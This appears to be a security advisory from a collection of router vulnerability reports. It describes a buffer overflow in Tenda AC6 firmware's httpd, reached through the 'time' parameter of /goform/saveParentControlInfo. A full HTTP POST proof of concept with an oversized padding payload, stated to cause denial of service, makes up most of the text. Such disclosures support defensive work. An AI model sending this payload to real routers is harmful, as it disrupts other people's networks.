AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

![image-20221118151225120](images/03.png)
--------------------------------------------------------------------------------
/tenda_ac6/saveParentControlInfo_time/saveParentControlInfo_time.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the saveParentControlInfo function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/saveParentControlInfo` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/saveParentControlInfo` page. The details are shown below:

![image-20221118151051075](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/saveParentControlInfo HTTP/1.1
Host: 192.168.204.133
Content-Length: 1157
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

time=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA